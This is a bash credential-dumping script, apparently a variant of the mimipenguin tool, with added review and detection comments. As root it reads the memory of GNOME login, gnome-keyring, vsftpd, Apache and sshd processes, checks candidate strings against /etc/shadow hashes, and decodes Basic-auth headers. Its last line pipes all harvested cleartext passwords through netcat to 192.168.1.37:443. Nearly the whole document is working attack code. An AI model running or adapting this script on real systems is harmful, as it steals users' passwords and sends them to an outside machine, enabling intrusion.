Capsh10

#!/bin/bash

# Author: Hunter Gregal
# Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com
# Dumps & sends cleartext credentials from memory

#root check
# Everything below reads other processes' memory through /proc/<pid>/mem and
# reads /etc/shadow, so any EUID other than 0 stops here with exit status 1.
if [[ "$EUID" -ne 0 ]]; then
  echo "Root required - You are dumping memory..."
  echo "Even mimikatz requires administrator"
  exit 1
fi

#Store results to cleanup later
# RESULTS accumulates one labelled entry per hit, separated by a literal
# backslash-n that printf %b turns into real newlines in the final block; it is
# the single value that block transmits. NOTE(review): because it is exported,
# every child process spawned after this point (grep, python2, nc, ...) inherits
# the credentials collected so far in its environment, where they are readable
# through /proc/<child pid>/environ for as long as that child runs.
export RESULTS=""

#######################################
# Copy the readable memory of one process into a file by walking its
# /proc/<pid>/maps and dd'ing each address range out of /proc/<pid>/mem.
# Arguments:
#   $1 - PID to read
#   $2 - output path prefix; data is appended to "$2.$1"
#   $3 - operating system label; "kali" keeps only readable ranges whose maps
#        line mentions heap or stack, any other value keeps every readable range
# Outputs: raw memory appended to "$2.$1"; dd's stdout/stderr are discarded
# Returns: status of the last dd; failures are not checked
# Globals: system, pid, output_file and mem_maps are assigned without `local`,
#          so they stay set in the caller after the function returns
# Detection note: reading /proc/<pid>/mem of another process passes the same
# kernel access check as ptrace-attaching to it. To an auditd syscall rule or an
# eBPF/EDR sensor this shows up as open()/read() of /proc/<pid>/mem by a process
# whose own PID differs from <pid>, followed by writes under /tmp.
#######################################
function dump_pid () {

  system=$3
  pid=$1
  output_file=$2
  # Keep maps lines whose permission field starts with "r" (readable), then
  # reduce each line to its "start-stop" hex address field.
  if [[ $system == "kali" ]]; then
    mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | grep -E 'heap|stack' | cut -d' ' -f 1)
  else
    mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1)
  fi
  while read -r memrange; do
    # Split "start-stop" and convert both hex bounds to decimal so that dd's
    # skip= and count= can take them as byte offsets.
    memrange_start=$(echo "$memrange" | cut -d"-" -f 1)
    memrange_start=$(printf "%u\n" 0x"$memrange_start")
    memrange_stop=$(echo "$memrange" | cut -d"-" -f 2)
    memrange_stop=$(printf "%u\n" 0x"$memrange_stop")
    memrange_size=$((memrange_stop - memrange_start))
    # ibs=1 makes skip/count byte-granular; oflag=append + conv=notrunc
    # concatenate every range into the same "$output_file.$pid" file.
    dd if=/proc/"$pid"/mem of="${output_file}"."${pid}" ibs=1 oflag=append conv=notrunc \
      skip="$memrange_start" count="$memrange_size" > /dev/null 2>&1
  done <<< "$mem_maps"
}



#######################################
# Test every candidate line from a memory dump against a password hash and
# record the matches in RESULTS.
# Arguments:
#   $1 - DUMP:   newline-separated candidate strings
#   $2 - HASH:   a crypt(3)-style "$id$salt$hash" string found in the dump;
#                may be empty
#   $3 - SALT:   the salt field of $2
#   $4 - SOURCE: label prefixed to every result entry
# Globals: appends to RESULTS (exported); reads /etc/shadow when $2 is empty;
#          assigns SHADOWHASHES, CTYPE, SAFE, CRYPT, SHADOWSALT, patterns and
#          USER (which overwrites the login shell's USER variable) globally.
# Per line, one of three modes runs:
#   1. $2 set:           crypt the line with $2's id prefix + $3 and compare to $2
#   2. $2 empty, shadow: crypt the line against each "$x$..." hash in /etc/shadow
#   3. no hashes at all: tag the line [HIGH] unconditionally, and additionally
#                        [LOW] for every heuristic pattern it matches (the
#                        [HIGH] entry is not removed, so both appear)
# NOTE(review): each candidate is spliced into a `python2 -c` program as a
# string literal; the sed step escapes backslash, double quote and single quote
# only. Hashing is delegated to python2's crypt module, so on a host without
# python2 modes 1 and 2 never match.
#######################################
function parse_pass () {

  #If hash not in dump get shadow hashes
  if [[ ! "$2" ]]; then
    SHADOWHASHES="$(cut -d':' -f 2 /etc/shadow | grep -E '^\$.\$')"
  fi

  #Determine password potential for each word
  while read -r line; do
    #If hash in dump, prepare crypt line
    if [[ "$2" ]]; then
      #get ctype
      # CTYPE is the first three characters of the hash, i.e. the "$id$" prefix
      CTYPE="$(echo "$2" | cut -c-3)"
      #Escape quotes, backslashes, single quotes to pass into crypt
      SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
      CRYPT="\"$SAFE\", \"$CTYPE$3\""
      if [[ $(python2 -c "import crypt; print crypt.crypt($CRYPT)") == "$2" ]]; then
        #Find which user's password it is (useful if used more than once!)
        # The hash is used as a basic regex here, not a fixed string.
        USER="$(grep "${2}" /etc/shadow | cut -d':' -f 1)"
        export RESULTS="$RESULTS$4 $USER:$line \n"
      fi
    #Else use shadow hashes
    elif [[ $SHADOWHASHES ]]; then
      while read -r thishash; do
        CTYPE="$(echo "$thishash" | cut -c-3)"
        # Third '$'-separated field of "$id$salt$hash" is the salt
        SHADOWSALT="$(echo "$thishash" | cut -d'$' -f 3)"
        #Escape quotes, backslashes, single quotes to pass into crypt
        SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
        CRYPT="\"$SAFE\", \"$CTYPE$SHADOWSALT\""
        if [[ $(python2 -c "import crypt; print crypt.crypt($CRYPT)") == "$thishash" ]]; then
          #Find which user's password it is (useful if used more than once!)
          USER="$(grep "${thishash}" /etc/shadow | cut -d':' -f 1)"
          export RESULTS="$RESULTS$4 $USER:$line\n"
        fi
      done <<< "$SHADOWHASHES"
    #if no hash data - revert to checking probability
    else
      # Extended regexes for strings that commonly sit next to the candidates in
      # memory; a match only lowers confidence, it does not exclude the line.
      patterns=("^_pammodutil.+[0-9]$"\
        "^LOGNAME="\
        "UTF-8"\
        "^splayManager[0-9]$"\
        "^gkr_system_authtok$"\
        "[0-9]{1,4}:[0-9]{1,4}:"\
        "Manager\.Worker"\
        "/usr/share"\
        "/bin"\
        "\.so\.[0-1]$"\
        "x86_64"\
        "(aoao)"\
        "stuv")
      export RESULTS="$RESULTS[HIGH]$4 $line\n"
      for pattern in "${patterns[@]}"; do
        if [[ $line =~ $pattern ]]; then
          export RESULTS="$RESULTS[LOW]$4 $line\n"
        fi
      done
    fi
  done <<< "$1"
} # end parse_pass


#Support Kali
# Section: GNOME login on Kali. Runs only when `uname -a`, lower-cased,
# contains "kali". Targets the gdm-session-worker [pam/gdm-password] processes
# found via ps. Host artifact: /tmp/dump.<pid> exists from dump_pid until the
# rm at the end of each loop iteration.
if [[ $(uname -a | awk '{print tolower($0)}') == *"kali"* ]]; then
  SOURCE="[SYSTEM - GNOME]"
  #get gdm-session-worker [pam/gdm-password] process
  PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk -F ' ' '{ print $1 }')"
  #if exists aka someone logged into gnome then extract...
  if [[ $PID ]];then
    while read -r pid; do
      # "kali" makes dump_pid keep only heap/stack ranges
      dump_pid "$pid" /tmp/dump "kali"
      # First "$id$salt$hash"-shaped printable string in the dump, and its
      # salt (third '$'-separated field)
      HASH="$(strings "/tmp/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
      SALT="$(echo "$HASH" | cut -d'$' -f 3)"
      # Candidates: 5 lines of context on either side of two marker strings
      DUMP="$(strings "/tmp/dump.${pid}" | grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)"
      DUMP="${DUMP}$(strings "/tmp/dump.${pid}" | grep -E '^gkr_system_authtok$' -B 5 -A 5)"
      #Remove dupes to speed up processing
      DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
      parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"

      #cleanup
      rm -rf "/tmp/dump.${pid}"
    done <<< "$PID"
  fi
fi

#Support gnome-keyring
# Section: gnome-keyring-daemon. Runs when a gnome-keyring process is present
# in ps output (the grep itself is filtered out). dump_pid is called without a
# third argument here, so every readable range of the daemon is copied, not
# just heap/stack. Host artifact: /tmp/dump.<pid> until the rm below.
if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then

  SOURCE="[SYSTEM - GNOME]"
  #get /usr/bin/gnome-keyring-daemon process
  PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk -F ' ' '{ print $1 }')"

  #if exists aka someone logged into gnome then extract...
  if [[ $PID ]];then
    while read -r pid; do
      dump_pid "$pid" /tmp/dump
      # First "$id$salt$hash"-shaped printable string and its salt field
      HASH="$(strings "/tmp/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
      SALT="$(echo "$HASH" | cut -d'$' -f 3)"
      # Candidates: context around strings naming libgck-1.so.0 / libgcrypt.so;
      # += appends the second result set to the first
      DUMP=$(strings "/tmp/dump.${pid}" | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10)
      DUMP+=$(strings "/tmp/dump.${pid}" | grep -E -A 5 -B 5 'libgcrypt\.so\..+$')
      #Remove dupes to speed up processing
      DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
      parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
      #cleanup
      rm -rf "/tmp/dump.${pid}"
    done <<< "$PID"
  fi
fi

#Support VSFTPd - Active Users
# Section: vsftpd. Runs when /etc/vsftpd.conf exists. Targets vsftpd processes
# running as user "nobody" (one dump_pid call each, all readable ranges).
# Host artifacts: /tmp/vsftpd.<pid> files; the final rm uses the glob
# /tmp/vsftpd*, which removes anything in /tmp with that prefix, not only the
# files written by this run.
if [[ -e "/etc/vsftpd.conf" ]]; then
  SOURCE="[SYSTEM - VSFTPD]"
  #get nobody /usr/sbin/vsftpd /etc/vsftpd.conf
  PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk -F ' ' '{ print $1 }')"
  #if exists aka someone logged into FTP then extract...
  if [[ $PID ]];then
    while read -r pid; do
      dump_pid "$pid" /tmp/vsftpd
      # First "$id$salt$hash"-shaped printable string and its salt field
      HASH="$(strings "/tmp/vsftpd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
      SALT="$(echo "$HASH" | cut -d'$' -f 3)"
      # Candidates: 5 lines of context around strings of the form "::...:a.b.c.d"
      # (presumably IPv4-mapped IPv6 client addresses -- not verifiable here)
      DUMP=$(strings "/tmp/vsftpd.${pid}" | grep -E -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$')
      #Remove dupes to speed up processing
      DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
      parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
    done <<< "$PID"

    #cleanup
    rm -rf /tmp/vsftpd*
  fi
fi

#Support Apache2 - HTTP BASIC AUTH
# Section: Apache HTTP Basic credentials. Runs when /etc/apache2/apache2.conf
# exists. Unlike the other sections this one uses gdb's gcore rather than
# dump_pid, so it depends on gdb being installed and performs a ptrace attach
# to every apache2 worker; gcore writes /tmp/apache.<pid> core files, which
# are the host artifacts until the glob rm at the end. Results bypass
# parse_pass entirely: the Authorization header value is base64-decoded as-is.
if [[ -e "/etc/apache2/apache2.conf" ]]; then
  SOURCE="[HTTP BASIC - APACHE2]"
  #get all apache workers /usr/sbin/apache2 -k start
  PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
  #if exists aka apache2 running
  if [[ "$PID" ]];then
    #Dump all workers
    while read -r pid; do
      gcore -o /tmp/apache "$pid" > /dev/null 2>&1
      #without gcore - VERY SLOW!
      #dump_pid $pid /tmp/apache
    done <<< "$PID"
    #Get encoded creds
    # The regex requires a trailing "=", so only padded base64 values are kept;
    # the third space-separated field is the encoded user:password.
    DUMP="$(strings /tmp/apache* | grep -E '^Authorization: Basic.+=$' | cut -d' ' -f 3)"
    #for each extracted b64 - decode the cleartext
    while read -r encoded; do
      # base64 -d reports malformed input on stderr, which is not redirected
      CREDS="$(echo "$encoded" | base64 -d)"
      if [[ "$CREDS" ]]; then
        export RESULTS="$RESULTS$SOURCE $CREDS\n"
      fi
    done <<< "$DUMP"
    #cleanup
    rm -rf /tmp/apache*
  fi
fi

#Support sshd - Search active connections for Sudo passwords
# Section: interactive SSH sessions. Runs when /etc/ssh/sshd_config exists.
# Targets the per-session sshd processes whose command line matches
# "sshd: <user>@<tty>" (all readable ranges via dump_pid). Host artifacts:
# /tmp/sshd.<pid> until the glob rm at the end.
if [[ -e "/etc/ssh/sshd_config" ]]; then
  SOURCE="[SYSTEM - SSH]"
  #get all ssh tty/pts sessions - sshd: user@pts01
  PID="$(ps -eo pid,command | grep -E 'sshd:.+@' | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
  #if exists aka someone logged into SSH then dump
  if [[ "$PID" ]];then
    while read -r pid; do
      dump_pid "$pid" /tmp/sshd
      # First "$id$salt$hash"-shaped printable string and its salt field
      HASH="$(strings "/tmp/sshd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
      SALT="$(echo "$HASH" | cut -d'$' -f 3)"
      # Candidates: the 3 lines following any printable string starting "sudo"
      DUMP=$(strings "/tmp/sshd.${pid}" | grep -E -A 3 '^sudo.+')
      #Remove dupes to speed up processing
      DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
      parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
    done <<< "$PID"
    #cleanup
    rm -rf /tmp/sshd.*
  fi
fi

  224. #Output results to STDOUT
  225. printf "%b" "$RESULTS" | sort -u | nc 192.168.1.37 443
  226. unset RESULTS